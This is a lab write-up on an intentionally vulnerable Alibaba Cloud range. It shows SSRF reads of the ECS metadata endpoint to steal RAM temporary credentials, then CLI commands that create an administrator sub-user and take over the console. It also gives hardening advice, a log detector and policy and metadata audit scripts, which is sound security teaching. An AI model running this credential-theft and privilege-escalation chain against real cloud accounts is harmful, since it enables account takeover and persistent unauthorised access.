
From the ECS SSRF vulnerability to taking over your alicloud console

2022-06-09 02:14:00 InfoQ

0x00 Preface

This article uses Alibaba Cloud as an example to demonstrate some offensive and defensive tactics in cloud services. It first uses Terraform to build an ECS SSRF vulnerability environment, then, step by step, uses the SSRF vulnerability on the instance to take over all Alibaba Cloud service permissions of the cloud account.

0x01 Environment building

This article uses TerraformGoat to build the range. Terraform range address:
https://github.com/HuoCorp/TerraformGoat

Deploying the range requires your Alibaba Cloud AccessKey. To avoid affecting your cloud production environment, it is strongly recommended to use an AccessKey from a non-production environment and not the same account as production.

Next, start building the range: first clone the range project locally, then build the image that downloads the dependencies the range needs.

git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1
cd TerraformGoat
docker build . -t terraformgoat:v0.0.3
docker run -itd --name terraformgoat terraformgoat:v0.0.3
docker exec -it terraformgoat /bin/bash

If GitHub access is slow, you can set a proxy in the terminal:

proxy_url="127.0.0.1:1080" && export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url

After entering the container, it will prompt you to choose the cloud service provider to use next. Taking Alibaba Cloud as an example, enter 2 to select alicloud and press Enter.

Enter the alicloud ECS SSRF range directory and configure your AccessKey:

cd /TerraformGoat/aliyun/ecs/ecs_ssrf/
aliyun configure

Deploy the SSRF range:

terraform init
terraform apply

If init is slow, set the proxy as above.

During apply, a prompt Enter a value will appear; type yes to continue.

In the Outputs section you can see the returned range address. Visiting this address shows the SSRF test range page, which means the environment has been set up.


0x02 Exploitation

The current environment has an SSRF vulnerability, but unlike an ordinary SSRF environment, here the SSRF vulnerability is on an ECS instance, which means we can use it to obtain the server's metadata.

Access the metadata:

http://100.100.100.200/latest/meta-data

In the returned results you can see a ram/ directory, which means the current ECS instance has a RAM role configured, so we can obtain temporary credentials from it.

Obtain temporary credentials through the metadata

Here huocorp-terraform-goat-role in the URL is the RAM role name, which can be obtained from http://100.100.100.200/latest/meta-data/ram/security-credentials/ .

http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role

Configure the temporary credentials in the aliyun command-line tool:

aliyun configure --mode StsToken

Create a sub-user and grant it administrator permission:

aliyun ram CreateUser --UserName teamssix
aliyun ram CreateLoginProfile --UserName teamssix --Password [email protected]
aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

Visit https://signin.aliyun.com and log in as a RAM user. The user name format here is username@company-alias, where username is the user just created and company-alias can be obtained with the following command:

aliyun ram GetAccountAlias

The AccountAlias here is the company-alias we need; with it you can log in to the console.

Enter the password you just created.

After logging in, you can see the target console.

Because the user was given the AdministratorAccess permission when it was created, you can see in RAM access control that the current account has permission to manage all Alibaba Cloud resources.

Under ECS in the cloud services you can also see the SSRF range server we just built.

At this point, the Alibaba Cloud console has been taken over by way of the SSRF vulnerability.

In addition, there is also a flag file; if you are interested, you can try to find the flag. Writeup address:
https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf
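From the defender's side, the step above leaves a trace: the vulnerable application fetched a URL whose host is the metadata address. The following detection script is an added example, not part of the original article or of TerraformGoat; it runs over constructed access-log lines for an assumed application that takes a "url" query parameter, and normalises decimal and hex host spellings so that encoded forms of 100.100.100.200 are still caught.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Alibaba Cloud ECS metadata service address used throughout the article.
METADATA_IP = ipaddress.ip_address("100.100.100.200")

# Constructed sample access-log lines (not from the range application):
# a web app that fetches a user-supplied "url" parameter, Nginx-style format.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2022:02:14:00 +0000] "GET /fetch?url=https%3A%2F%2Fexample.com%2Ffeed HTTP/1.1" 200 512
10.0.0.9 - - [09/Jun/2022:02:15:10 +0000] "GET /fetch?url=http%3A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2Fram%2Fsecurity-credentials%2F HTTP/1.1" 200 88
10.0.0.9 - - [09/Jun/2022:02:15:12 +0000] "GET /fetch?url=http%3A%2F%2F1684301000%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 300
10.0.0.9 - - [09/Jun/2022:02:15:14 +0000] "GET /fetch?url=http%3A%2F%2F0x646464C8%2Flatest%2Fapi%2Ftoken HTTP/1.1" 200 56
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def host_to_ip(host):
    """Normalise a URL host to an IP address; accepts dotted, decimal and hex forms."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))  # e.g. "1684301000" or "0x646464c8"
    except ValueError:
        return None  # a hostname; would need DNS resolution to classify


def metadata_requests(log_text):
    """Return (client_ip, target_url) for every request whose url parameter points at the metadata IP."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes the parameter, so the metadata host is recovered
        # even when the caller URL-encodes it.
        for target in parse_qs(urlsplit(match.group(1)).query).get("url", []):
            if host_to_ip(urlsplit(target).hostname or "") == METADATA_IP:
                hits.append((line.split()[0], target))
    return hits


if __name__ == "__main__":
    for client, url in metadata_requests(SAMPLE_LOG):
        print(f"metadata access via SSRF from {client}: {url}")
```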

0x03 Defensive measures

Apart from the SSRF itself, this environment has two other main problems:

  • The RAM role's permissions are too broad, so the role's permissions can be used to create sub-users and grant them high privileges
  • Metadata access is not hardened, so once the target has an SSRF vulnerability, the metadata is at risk of being obtained

For the first problem, the RAM role's permissions being too broad, users should strictly follow the principle of least privilege: when granting permissions to a RAM role, avoid giving too much and give only what is actually needed. This minimizes the impact, but it does not address the root cause.
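One way to audit that principle is to check whether a role's policies, taken together, permit the three RAM actions the walkthrough chained (CreateUser, CreateLoginProfile, AttachPolicyToUser). The evaluator below is an added example, not code from the article or from TerraformGoat; the policy documents are constructed in Alibaba Cloud RAM policy syntax, the bucket name is a placeholder, and the matcher deliberately ignores Resource and Condition.

```python
import fnmatch

# The RAM actions the walkthrough needed to create an administrator sub-user.
TAKEOVER_ACTIONS = ("ram:CreateUser", "ram:CreateLoginProfile", "ram:AttachPolicyToUser")

# Constructed policy documents in Alibaba Cloud RAM policy syntax (not the range's real policies).
ADMIN_LIKE = {"Version": "1", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]}
LEAST_PRIVILEGE = {"Version": "1", "Statement": [
    {"Effect": "Allow", "Action": ["oss:GetObject", "oss:ListObjects"],
     "Resource": "acs:oss:*:*:example-bucket/*"}]}  # placeholder bucket name
DENY_GUARD = {"Version": "1", "Statement": [
    {"Effect": "Allow", "Action": "ram:*", "Resource": "*"},
    {"Effect": "Deny", "Action": ["ram:CreateUser", "ram:AttachPolicyToUser"], "Resource": "*"}]}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def action_allowed(policies, action):
    """Evaluate one action across all policy documents: an explicit Deny wins,
    otherwise any matching Allow grants it. Resource and Condition are ignored
    here, which is acceptable for the ram:* actions above (normally granted on "*")."""
    allowed = False
    for doc in policies:
        for stmt in doc.get("Statement", []):
            patterns = [p.lower() for p in _as_list(stmt.get("Action", []))]
            if not any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                continue
            if stmt.get("Effect") == "Deny":
                return False
            if stmt.get("Effect") == "Allow":
                allowed = True
    return allowed


def takeover_capable(policies):
    """Map each takeover action to whether the role's combined policies permit it."""
    return {a: action_allowed(policies, a) for a in TAKEOVER_ACTIONS}


def role_can_take_over(policies):
    """True when every action in the takeover chain is permitted."""
    return all(takeover_capable(policies).values())


if __name__ == "__main__":
    for name, docs in (("admin-like", [ADMIN_LIKE]), ("least-privilege", [LEAST_PRIVILEGE]),
                       ("deny-guard", [DENY_GUARD])):
        print(name, takeover_capable(docs))
```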

The second problem is that metadata access is not hardened. You can set the instance's metadata access mode to hardened mode, which addresses the root cause. There are two ways to do this:

  • When creating an instance, under System Configuration > Advanced Options, set Instance Metadata Access Mode to Hardened mode only

  • For an already created instance, enable token-based metadata access through the Alibaba Cloud OpenAPI. OpenAPI address:
    https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions

Setting HttpTokens to required enforces hardened mode; after that, accessing the metadata without a token returns 403.

It is worth noting that setting the metadata to hardened mode prevents obtaining the metadata through SSRF, but if the instance itself is compromised, the red team can still run the token-fetching command on the instance and then use the token to retrieve the metadata.

On Linux, the command to obtain the token inside the instance is as follows:

TOKEN=`curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds: 21600"`

Fetch the metadata with the token:

curl -H "X-aliyun-ecs-metadata-token: $TOKEN" http://100.100.100.200/latest/meta-data/

For Windows instances, refer to the official Alibaba Cloud documentation:
https://help.aliyun.com/document_detail/108460.htm
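To find instances that are still in the non-hardened mode across an account, the metadata options can be read from DescribeInstances output and a ModifyInstanceMetadataOptions call generated for each offender. This is an added example, not code from the article or from TerraformGoat; the sample output is constructed with placeholder instance ids, and the field names (Instances.Instance[].MetadataOptions.HttpEndpoint/HttpTokens, RegionId) and CLI parameter names are assumed from the ECS API.

```python
import json

# Constructed sample shaped like the JSON that `aliyun ecs DescribeInstances` prints.
# Field names are assumed from the ECS API; the instance ids are placeholders, not real instances.
SAMPLE_OUTPUT = json.dumps({"Instances": {"Instance": [
    {"InstanceId": "i-placeholder-1", "RegionId": "cn-hangzhou",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional"}},
    {"InstanceId": "i-placeholder-2", "RegionId": "cn-hangzhou",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required"}},
    {"InstanceId": "i-placeholder-3", "RegionId": "cn-hangzhou",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional"}},
    {"InstanceId": "i-placeholder-4", "RegionId": "cn-hangzhou"},  # options block missing
]}})


def unhardened_instances(describe_json):
    """Return (InstanceId, RegionId) for instances whose metadata endpoint answers without a token."""
    findings = []
    for inst in json.loads(describe_json)["Instances"]["Instance"]:
        opts = inst.get("MetadataOptions") or {}
        # A missing block is treated as the pre-hardening default: endpoint on, token optional.
        endpoint = opts.get("HttpEndpoint", "enabled")
        tokens = opts.get("HttpTokens", "optional")
        if endpoint == "enabled" and tokens != "required":
            findings.append((inst["InstanceId"], inst["RegionId"]))
    return findings


def remediation_commands(describe_json):
    """One ModifyInstanceMetadataOptions call per finding, forcing HttpTokens=required
    (the setting the article describes); parameter names are assumed to match the OpenAPI."""
    return [
        f"aliyun ecs ModifyInstanceMetadataOptions --RegionId {region} "
        f"--InstanceId {iid} --HttpTokens required"
        for iid, region in unhardened_instances(describe_json)
    ]


if __name__ == "__main__":
    # Live use: replace SAMPLE_OUTPUT with the real `aliyun ecs DescribeInstances` output.
    for cmd in remediation_commands(SAMPLE_OUTPUT):
        print(cmd)
```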

The method of defending against SSRF by setting the metadata access mode to hardened mode was provided by 2h0ng.

0x04 Environment deletion

Delete the created sub-account:

aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix
aliyun ram DeleteUser --UserName teamssix

Delete the SSRF range environment. After using the range, remember to delete it promptly, because the cloud service created here is billed by time; this range instance costs 0.17 RMB per hour.

Before destroying the range, remember to switch the configuration back to your original AccessKey. Configuration command: aliyun configure --mode AK

terraform destroy

If you want to remove TerraformGoat, use the following commands. If you plan to keep learning cloud attack and defense, you can keep the TerraformGoat environment instead.

docker stop terraformgoat
docker rm terraformgoat
docker rmi terraformgoat:v0.0.3

0x05 Summary

Here, the temporary key was obtained through a cloud SSRF vulnerability, a sub-user with administrator access was created with the temporary key, and finally the target console was taken over through that sub-user.

But using this method in practice has some prerequisites, mainly two:

  • The ECS instance needs to be granted a RAM role; otherwise accessing the temporary-credential metadata returns 404
  • The RAM role needs the RAM access-control permissions involved, such as creating users and granting permissions; otherwise the temporary key will not be able to create sub-users

In practice, when an ECS instance has been granted a RAM role, most of the time that role does not have permission to create users. In that case you cannot log in to the console by creating a sub-account and can only operate the target cloud services through the Alibaba Cloud command-line tool.

In general, cloud attack and defense differ greatly from conventional intranet attack and defense:

  • The common problem in cloud attack and defense is misconfiguration; for example, the problem here is that the RAM role is configured with too much permission.
  • The main way to maintain access on the cloud is to create high-privilege RAM users, rather than the many persistence techniques of traditional attack and defense.
  • Lateral movement on the cloud happens mainly in the cloud provider's command line or console, from one cloud service to another, rather than through the many intranet lateral-movement techniques of traditional attack and defense.
  • ……

Finally, many of the commands mentioned in this article refer to the Huoxian cloud security knowledge base. Knowledge base address:
https://cloudsec.huoxian.cn
On the knowledge base homepage you can see the Huoxian cloud service attack and defense matrix; this article carries out cloud attack and defense based on that matrix.

If you want more cloud security resources to learn from, you can visit the Awesome Cloud Security project, which has collected more than 100 domestic and foreign cloud security blogs, tools, official accounts and other resources. Project address:
https://github.com/teamssix/awesome-cloud-security

Reference article:
https://cloudsec.huoxian.cn/docs/articles/aliyun/aliyun_ecs

This article was first published on Huoxian Zone: https://zone.huoxian.cn Author: TeamsSix